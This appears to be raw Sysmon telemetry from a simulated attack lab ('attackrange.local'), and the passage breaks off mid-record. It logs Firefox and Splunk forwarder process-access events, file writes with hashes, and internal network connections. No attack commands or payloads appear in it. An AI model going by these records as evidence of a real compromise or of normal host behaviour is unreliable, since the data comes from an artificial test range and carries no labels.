Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151342Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.197{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151341Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.196{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 23542300x8000000000000000151340Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.178{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1964E74B73DEF04F6D9DABA1F15A3184,SHA256=E40D08DD9AAD6BD86E7CFA97AA4D4E6BFEC025AD3C008F3C3AC400772F137EF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104901Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:07.505{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC4EAACDF485DC703D62B56E497C2FC3,SHA256=CB737C58350D408B924EADC18A2BE657FEDA5673BE0886E702C298847A4D6D19,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151362Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-711F-60CA-1E0D-00000000D101}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151361Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151360Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151359Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151358Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151357Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-711F-60CA-1E0D-00000000D101}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151356Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.863{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-711F-60CA-1E0D-00000000D101}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151355Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.864{39BD8DE3-711F-60CA-1E0D-00000000D101}832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151354Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.617{39BD8DE3-480D-60CA-F607-00000000D101}5112NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151353Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.013{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58397-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000151352Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.881{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58396-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal7443- 23542300x8000000000000000151351Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.180{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87310B1FE2F5002F96F273BC8684E34,SHA256=41BDA4BF6318CFEDE37D5F4CC9AB5F582E8039F99CF262187C26764E75657D1E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151350Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.121{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+51b80|C:\Program Files\Mozilla Firefox\xul.dll+29f5e8d|C:\Program Files\Mozilla Firefox\xul.dll+29f5997|C:\Program Files\Mozilla Firefox\xul.dll+dadc99|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb|C:\Program Files\Mozilla Firefox\xul.dll+4025f|C:\Program Files\Mozilla Firefox\xul.dll+1230b8e|C:\Program Files\Mozilla Firefox\xul.dll+12092bf|C:\Program Files\Mozilla Firefox\xul.dll+3f67e|C:\Program Files\Mozilla Firefox\xul.dll+3c7ca8|C:\Program Files\Mozilla Firefox\xul.dll+3c68ff|C:\Program Files\Mozilla Firefox\xul.dll+39d1b0a|C:\Program Files\Mozilla Firefox\xul.dll+3a6ebb7|C:\Program Files\Mozilla Firefox\xul.dll+3a70129|C:\Program Files\Mozilla Firefox\xul.dll+3f13|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c548|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151349Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:07.017{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A4FF5031DF05C2B2292F78150B826EB,SHA256=205279491B514D1838996561CEAD477F5B400906D87E894423B6AADC767C7400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104903Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:08.866{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B43142272E484B823182848B574FA6C,SHA256=E82C5F3F10B315A7E3596CF69010DD9B74FB465628C6E2BA0A3D969E0C190B76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104902Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:06.787{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55415-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151381Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.816{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\cache2\entries\6F873A08E9E8E9E300249BEFE8D25DC05917C899MD5=6EFA8D812E658C271E96A521F3E8767E,SHA256=B08CDEA850007FAAA023C766F0D1168CEFE93CF4BC457A66C325E399A43B9F8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151380Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.731{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151379Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.731{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 23542300x8000000000000000151378Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.716{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\formhistory.sqlite-journalMD5=EE6B4016F3013CF4A3530F1BAF8B7A53,SHA256=CB67233C3E41EA31C479F923F423E9010CB4BB903D564000F7EA6957D0B9A629,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151377Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.700{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb 10341000x8000000000000000151376Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.700{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916 10341000x8000000000000000151375Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.647{39BD8DE3-7120-60CA-1F0D-00000000D101}70805888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151374Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.631{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7511AF011A49AC6CA937FB94B11D1005,SHA256=1D4C186A9E683C72ADA0914235F39548BCDF6377781CAA6E2E130A5A33E26F52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151373Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:08.447{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7120-60CA-1F0D-00000000D101}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151372Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 